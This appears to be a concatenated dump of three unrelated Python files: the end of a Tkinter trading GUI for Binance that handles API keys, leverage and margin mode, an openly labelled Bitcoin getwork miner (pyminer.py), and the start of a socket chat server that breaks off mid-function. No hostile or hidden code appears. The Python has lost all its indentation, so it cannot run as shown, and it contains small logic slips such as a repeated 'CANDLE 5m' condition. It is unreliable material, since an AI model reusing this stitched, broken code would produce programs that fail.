def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
if GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
#__Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#__Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('symbol',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset','-'))
app.Tree_PI.item(6, values=('contractType','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('symbol',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistFT[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('contractType',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
messagebox.showinfo("Set changes decline", "There are open positions on this pair " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
messagebox.showinfo("Set changes decline", "There are no changes for this pair " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
messagebox.showinfo("Set changes decline", "There are open orders for this pair " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Leverage for this pair " + grSmb + " changed" + Lvrg_Tmp)
sys_msg = ' The pair\'s leverage ' + grSmb + ' posted x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Margin for this pair " + grSmb + " changed" + MrgT_Tmp)
sys_msg = ' Pair Margin Mode ' + grSmb + ' posted:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
def market_selected(self,choice):
global MS
MS = choice
if MS == 'SPOT':
app.CB_MrgT['values'] = ('NONE')
app.CB_MrgT.current(0)
MrgT='NONE'
app.CB_Lvrg['values'] = ('1')
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'All':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('iTrader. Trading on Binance')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Keys',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Balances',command=clicked_blns)
new_item.add_command(label='Orders',command=clicked_Ordrs)
menu.add_cascade(label='Account', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Launching the program. Connecting to Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance time: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Reading the Binance markets ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set=grSmb
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance Markets are read.'
app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The program is ready to work!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Current chart: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Current Market: ' + MS + '. Current Pairs: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Current Pair: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file is missing. You need to enter API_KEYS in the Account menu to work with the program'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file is empty. You need to enter API_KEYS in the Account menu to work with the program'
else:
my_file_Account = open("iTrader.cfg", "r")
l = 0
while True:
sss00 = my_file_Account.readline()
if not sss00:
break
if l == 0:
API_KEY_s = sss00.replace ("\n", "")
elif l == 1:
API_SECRET_s = sss00.replace ("\n", "")
l +=1
my_file_Account.close()
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file was read successfully.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file was read with errors. You need to enter API_KEYS in the Account menu to work with the program'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT account. Permissions: " + str(myListAcc['permissions']) + '. Can Deposit: ' + str(myListAcc['canDeposit'])
sys_msg += str(". Can withdraw: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
def config(event):
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.Tree_Pos.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Pos_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-160,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
app.label_CmdOrd.place(height=event.height-300-(event.height-710),width=198,x=0,y=130+(event.height-320-390))
app.text_Sys.place(height=150,width=event.width-440,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-430,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 21794
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
# -*- coding:utf-8 -*-
from socket import socket
import threading
import json
# id : [사용자 이름]
# action : [create | join | send_msg | broadcast | out ]
# action_value : [action에 따른 수행 값]
class Server :
def __init__(self):
self.server_sock = socket()
self.clients = []
self.rooms = {} #{ room : [clients] }
def __client_th__(self, client_sock):
while True :
data = client_sock.recv()
protocol = json.loads(data)
